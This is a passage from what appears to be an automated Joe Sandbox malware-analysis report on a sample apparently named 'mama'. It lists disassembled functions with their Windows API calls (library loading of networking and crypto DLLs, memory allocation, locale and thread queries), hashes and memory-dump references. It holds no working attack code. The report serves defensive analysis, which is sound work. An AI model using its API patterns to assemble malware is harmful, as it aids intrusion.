                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: fce79f515696b971b3f1eca12a16fa3481a13cdfdcd4e9cd39615ad241fb763a
                                                                        • Instruction ID: fc92117646d861a80d1d5bf1dbf2530b4d1dbc8404ff99541096771dc763ba8d
                                                                        • Opcode Fuzzy Hash: fce79f515696b971b3f1eca12a16fa3481a13cdfdcd4e9cd39615ad241fb763a
                                                                        • Instruction Fuzzy Hash: B8018F72B06218AFCB40DB9DD880B8EB7ECEB49260F044066F508DB395D6719D00C7A0
                                                                        Function 0306D244 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 337 306d244-306d252 338 306d254-306d26b GetModuleFileNameW call 306e4b8 337->338 339 306d27f-306d28a 337->339 341 306d270-306d277 338->341 341->339 342 306d279-306d27c 341->342 342->339
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00400000,?,0000020A,00400000,0355EC1C,0306D2B0,?,?,030700C0), ref: 0306D262
                                                                          • Part of subcall function 0306E4B8: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0306E572,?,00400000,0355EC1C,?,0306D270,00400000,?,0000020A,00400000,0355EC1C,0306D2B0), ref: 0306E4F4
                                                                          • Part of subcall function 0306E4B8: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0306E572,?,00400000,0355EC1C,?,0306D270,00400000,?,0000020A), ref: 0306E545
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileModuleName$LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 4113206344-0
                                                                        • Opcode ID: 7c1ee64858cc89b131c1bcaaf4c5d23a408bec5d341bc7def07cd761b0403ce4
                                                                        • Instruction ID: a97e9d345890bfc99c1be1f8da11b65732ab28d11e9315335755e8aa9bbbf09a
                                                                        • Opcode Fuzzy Hash: 7c1ee64858cc89b131c1bcaaf4c5d23a408bec5d341bc7def07cd761b0403ce4
                                                                        • Instruction Fuzzy Hash: AFE06DB5A013108BCF10DF6CC8C0A4733E8AF18650F040690EC18CF34AD370C91087E1
                                                                        Function 030656B8 Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 343 30656b8-30656d6 call 306564c VirtualAlloc 346 3065726-3065731 343->346 347 30656d8-3065725 343->347
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,03065CCF), ref: 030656CF
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 6ff7d5f6f16dfbc1f6206a0884aaaf3665a6b726a22c5bb8610cfb6221ad09cb
                                                                        • Instruction ID: eaad7e2e2fd1982acc94f8cdabd8700dda8572f76912ab4134fb50d27284879c
                                                                        • Opcode Fuzzy Hash: 6ff7d5f6f16dfbc1f6206a0884aaaf3665a6b726a22c5bb8610cfb6221ad09cb
                                                                        • Instruction Fuzzy Hash: 0CF08CF2B013114BE714EF78A940B42BBD4A745350F12413EE909EB798D7B088069784

                                                                        Non-executed Functions

                                                                        Function 0306DBC4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,0306DEFB,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0306DFD9), ref: 0306DBE1
                                                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0306DBF2
                                                                        • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?,?,0306DEFB,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?), ref: 0306DCF2
                                                                        • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?,?,0306DEFB,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019), ref: 0306DD04
                                                                        • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?,?,0306DEFB,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales,00000000), ref: 0306DD10
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?,?,0306DEFB,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales), ref: 0306DD55
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                        • String ID: GetLongPathNameW$\$kernel32.dll
                                                                        • API String ID: 1930782624-3908791685
                                                                        • Opcode ID: 89fae09989609a3ed9c609f371affb3d98a7d34d305b5c10465f914848b423cf
                                                                        • Instruction ID: 58af39c9b3e388b5a1214691537c76853a1d5d15b6b57ba2ee38e86efa7b4278
                                                                        • Opcode Fuzzy Hash: 89fae09989609a3ed9c609f371affb3d98a7d34d305b5c10465f914848b423cf
                                                                        • Instruction Fuzzy Hash: A3419E75F02619DBCB10EBA8CC84ADEB3B9EF85310F1885A5C404EB259E7B4EE458A45
                                                                        Function 03525920 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,03525B9D), ref: 0352594B
                                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,03525B9D), ref: 03525975
                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,RtlGetVersion,00000000,03525AD5,?,?,?,?,?,?,03525B9D), ref: 035259C2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Version$LibraryLoad
                                                                        • String ID: RtlGetVersion$ntdll.dll
                                                                        • API String ID: 192404683-1489217083
                                                                        • Opcode ID: 0e8e3d77889a4716915f84b18eecdc55e7c902c7f03c3e2ad0ed90dd85630465
                                                                        • Instruction ID: 642a4677dd9fa3a24086c52072225c1cb7d33573901b389b1a56e6c29ff1f108
                                                                        • Opcode Fuzzy Hash: 0e8e3d77889a4716915f84b18eecdc55e7c902c7f03c3e2ad0ed90dd85630465
                                                                        • Instruction Fuzzy Hash: 5451C238A05218EFCB14DBA8D585ADDBBF4FF4A311F6584E5E805A7260E3309E40DB50
                                                                        Function 0306D768 Relevance: 4.6, APIs: 3, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsValidLocale.KERNEL32(?,00000002,00000000,0306D8CD,?,?,?,00000000), ref: 0306D812
                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0306D8CD,?,?,?,00000000), ref: 0306D82E
                                                                        • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0306D8CD,?,?,?,00000000), ref: 0306D83F
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Locale$Info$Valid
                                                                        • String ID:
                                                                        • API String ID: 1826331170-0
                                                                        • Opcode ID: eb9274765aba18f348be7395cbe40f41ac2b4bf620059cc79e26a587241bb401
                                                                        • Instruction ID: a8141b2bcd0fd12a2d5bd03a0eba5a394d7e8b5850408abc99931eec381a01d3
                                                                        • Opcode Fuzzy Hash: eb9274765aba18f348be7395cbe40f41ac2b4bf620059cc79e26a587241bb401
                                                                        • Instruction Fuzzy Hash: C8319D74A01708AFDB20EF64CC99BDFB7B9FB84701F0004A5E509AB268E6316E85CE11
                                                                        Function 0320C878 Relevance: 42.1, APIs: 12, Strings: 12, Instructions: 112libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 0320C8ED
                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,user32.dll), ref: 0320C909
                                                                        • LoadLibraryW.KERNEL32(advapi32.dll,ntdll.dll,user32.dll), ref: 0320C925
                                                                        • LoadLibraryW.KERNEL32(shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C941
                                                                        • LoadLibraryW.KERNEL32(ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C95D
                                                                        • LoadLibraryW.KERNEL32(ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C979
                                                                        • LoadLibraryW.KERNEL32(wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C995
                                                                        • LoadLibraryW.KERNEL32(wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C9AE
                                                                        • LoadLibraryW.KERNEL32(crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C9C7
                                                                        • LoadLibraryW.KERNEL32(PSAPI.dll,crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C9E0
                                                                        • LoadLibraryW.KERNEL32(gdi32.dll,PSAPI.dll,crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C9F9
                                                                        • LoadLibraryW.KERNEL32(Iphlpapi.dll,gdi32.dll,PSAPI.dll,crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320CA12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID: Iphlpapi.dll$PSAPI.dll$advapi32.dll$crypt32.dll$gdi32.dll$ntdll.dll$ole32.dll$shell32.dll$user32.dll$wininet.dll$ws2_32.dll$wtsapi32.dll
                                                                        • API String ID: 1029625771-1098239973
                                                                        • Opcode ID: 96ad70e2ae53eae10ea8e2574660a34cb42b6e8cfb46d73e18924e5316c28263
                                                                        • Instruction ID: 4709318aca013496e334439604f749b4d0a19601e137aa8a64db4fc23a18df83
                                                                        • Opcode Fuzzy Hash: 96ad70e2ae53eae10ea8e2574660a34cb42b6e8cfb46d73e18924e5316c28263
                                                                        • Instruction Fuzzy Hash: F04119B8929328FFCB40EF6CD54198C7BF4EB4D200F5042A5D405BB29AD7705A89AF91
                                                                        Function 0306DA80 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(0359EC14,00000000,0306DB84,?,?,?,00000000,?,0306E44C,00000000,0306E4AB,?,?,00000000,00000000,00000000), ref: 0306DA9E
                                                                        • LeaveCriticalSection.KERNEL32(0359EC14,0359EC14,00000000,0306DB84,?,?,?,00000000,?,0306E44C,00000000,0306E4AB,?,?,00000000,00000000), ref: 0306DAC2
                                                                        • LeaveCriticalSection.KERNEL32(0359EC14,0359EC14,00000000,0306DB84,?,?,?,00000000,?,0306E44C,00000000,0306E4AB,?,?,00000000,00000000), ref: 0306DAD1
                                                                        • IsValidLocale.KERNEL32(00000000,00000002,0359EC14,0359EC14,00000000,0306DB84,?,?,?,00000000,?,0306E44C,00000000,0306E4AB), ref: 0306DAE3
                                                                        • EnterCriticalSection.KERNEL32(0359EC14,00000000,00000002,0359EC14,0359EC14,00000000,0306DB84,?,?,?,00000000,?,0306E44C,00000000,0306E4AB), ref: 0306DB40
                                                                        • LeaveCriticalSection.KERNEL32(0359EC14,0359EC14,00000000,00000002,0359EC14,0359EC14,00000000,0306DB84,?,?,?,00000000,?,0306E44C,00000000,0306E4AB), ref: 0306DB69
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                        • String ID: en-GB,en,en-US,
                                                                        • API String ID: 975949045-3021119265
                                                                        • Opcode ID: 3eb12a061f2c1c2b1356463029ef34f8794e7d4027da78510899cf028144a865
                                                                        • Instruction ID: f814d49785ce8ee9c425fa5765203b8fccbc534a669bf85fa9f938ac95b65598
                                                                        • Opcode Fuzzy Hash: 3eb12a061f2c1c2b1356463029ef34f8794e7d4027da78510899cf028144a865
                                                                        • Instruction Fuzzy Hash: 2421B468702740AEEB11F7789D52A9E72D8ABCBA00F545426E0809F25DDAB4CD4193A7
                                                                        Function 030687A8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 030687BD
                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 030687C3
                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 030687D6
                                                                        • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 030687DF
                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,03068856,?,00000000,?,GetLogicalProcessorInformation), ref: 0306880A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                                        • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                        • API String ID: 1184211438-79381301
                                                                        • Opcode ID: 62b4c0e48f02b3535a526be214e180a8cf36d8d2605d903d864ac4c4a66f2a9d
                                                                        • Instruction ID: 77f90d906b9ea695d16621366e581ae884d36fda578ae0b200b34bc5b34d94ad
                                                                        • Opcode Fuzzy Hash: 62b4c0e48f02b3535a526be214e180a8cf36d8d2605d903d864ac4c4a66f2a9d
                                                                        • Instruction Fuzzy Hash: 35119075D02308AFDF90EBE5D805AADB7F8EF81700F18C4A5E8249B649D7788A80CB51
                                                                        Function 030717B0 Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 03071868
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionRaise
                                                                        • String ID:
                                                                        • API String ID: 3997070919-0
                                                                        • Opcode ID: 0146118b7b611e14a6bfd8fe03ff424689794cd5784454c8814d8f6cd8998f65
                                                                        • Instruction ID: 96c9db03e0bc678788c96025037932ee2718cf5bddce68a8242f142c9eba5045
                                                                        • Opcode Fuzzy Hash: 0146118b7b611e14a6bfd8fe03ff424689794cd5784454c8814d8f6cd8998f65
                                                                        • Instruction Fuzzy Hash: E4A16C76E02309AFDB18DFA8D880BEEB7F5EF88310F14411AE505AB2D4D770A946CB54
                                                                        Function 03068A30 Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03068EBC: GetCurrentThreadId.KERNEL32 ref: 03068EBF
                                                                        • GetTickCount.KERNEL32 ref: 03068A67
                                                                        • GetTickCount.KERNEL32 ref: 03068A7F
                                                                        • GetCurrentThreadId.KERNEL32 ref: 03068AAE
                                                                        • GetTickCount.KERNEL32 ref: 03068AD9
                                                                        • GetTickCount.KERNEL32 ref: 03068B10
                                                                        • GetTickCount.KERNEL32 ref: 03068B3A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 03068BAA
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CountTick$CurrentThread
                                                                        • String ID:
                                                                        • API String ID: 3968769311-0
                                                                        • Opcode ID: f8c2297d3415131bc40d82e006c4f54c2b67007d2da8612aea69a5233267adce
                                                                        • Instruction ID: fe9e0e7981f4c9d5b8a0be9dfd2e3b0e3b208f345a910af24efdd2d4acb16cc8
                                                                        • Opcode Fuzzy Hash: f8c2297d3415131bc40d82e006c4f54c2b67007d2da8612aea69a5233267adce
                                                                        • Instruction Fuzzy Hash: 74418E7020A3419EE761EF7CC98436EBBD5AF85350F1CCD6DD8E88B289EB7494808752
                                                                        Function 03069AF4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,03069BB2,?,?,00000000,00000000,03069CC6,03069CE0,?,?,030711E8), ref: 03069B2D
                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,03069BB2,?,?,00000000,00000000,03069CC6,03069CE0), ref: 03069B33
                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,03069BB2,?,?,00000000), ref: 03069B4E
                                                                        • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,03069BB2,?,?), ref: 03069B54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileHandleWrite
                                                                        • String ID: Error$Runtime error at 00000000
                                                                        • API String ID: 3320372497-2970929446
                                                                        • Opcode ID: dab5b667db0ed26c63e85e20e21ab27828559e0887761fdcb93fc69efdf76a62
                                                                        • Instruction ID: ff7aaa893781064ed9e5e4546a8e6cf5e250a243b0a4b27bfde8233a2ac8b4e7
                                                                        • Opcode Fuzzy Hash: dab5b667db0ed26c63e85e20e21ab27828559e0887761fdcb93fc69efdf76a62
                                                                        • Instruction Fuzzy Hash: DDF046A424234479EA00F3686D43FEE22ACA3CAE10F18110BB260AC0EDC3B446C89731
                                                                        Function 0320C800 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 10libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(user32.dll,03550B3B,00000000,03550EDA), ref: 0320C805
                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,user32.dll,03550B3B,00000000,03550EDA), ref: 0320C814
                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,kernel32.dll,user32.dll,03550B3B,00000000,03550EDA), ref: 0320C823
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID: kernel32.dll$ntdll.dll$user32.dll
                                                                        • API String ID: 1029625771-3818928520
                                                                        • Opcode ID: cccc6173305071c273463923cc0deca4b915ff0266d7e668085b4a829264ed03
                                                                        • Instruction ID: 76f4e35e62d337719196c895248a70d3ee5b1c4003c3e878f51d5c7a3ce193bf
                                                                        • Opcode Fuzzy Hash: cccc6173305071c273463923cc0deca4b915ff0266d7e668085b4a829264ed03
                                                                        • Instruction Fuzzy Hash: BDC002E8D663187EAB91FF68648386C25A4E681900B401395D418AF5DADBB00489BBDA
                                                                        Function 0306D964 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0306D975
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0306D9D3
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0306DA30
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0306DA63
                                                                          • Part of subcall function 0306D920: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0306D9E1), ref: 0306D937
                                                                          • Part of subcall function 0306D920: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0306D9E1), ref: 0306D954
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Thread$LanguagesPreferred$Language
                                                                        • String ID:
                                                                        • API String ID: 2255706666-0
